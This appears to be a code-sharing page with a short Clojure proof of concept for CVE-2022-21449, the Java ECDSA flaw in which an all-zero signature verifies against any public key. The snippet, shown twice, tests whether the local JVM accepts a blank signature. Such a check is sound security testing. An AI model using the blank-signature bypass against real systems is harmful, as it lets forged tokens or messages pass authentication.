liquidz · April 20, 2022 23:20
diff --git a/cve_2022_21449.clj b/cve_2022_21449.clj
 (ns cve-2022-21449
  (:import
    (java.security
      KeyPairGenerator
      Signature)))

 (def key-pair
  (.. (KeyPairGenerator/getInstance "EC")
      (generateKeyPair)))

 (def blank-signature
  (byte-array 64))

 (defn -main
  [& _]
  (let [sig (doto (Signature/getInstance "SHA256WithECDSAInP1363Format")
              (.initVerify (.getPublic key-pair))
              (.update (.getBytes "Hello World")))]
    (println
      (.verify sig blank-signature))))
	(ns cve-2022-21449
	(:import
	(java.security
	KeyPairGenerator
	Signature)))

	(def key-pair
	(.. (KeyPairGenerator/getInstance "EC")
	(generateKeyPair)))

	(def blank-signature
	(byte-array 64))

	(defn -main
	[& _]
	(let [sig (doto (Signature/getInstance "SHA256WithECDSAInP1363Format")
	(.initVerify (.getPublic key-pair))
	(.update (.getBytes "Hello World")))]
	(println
	(.verify sig blank-signature))))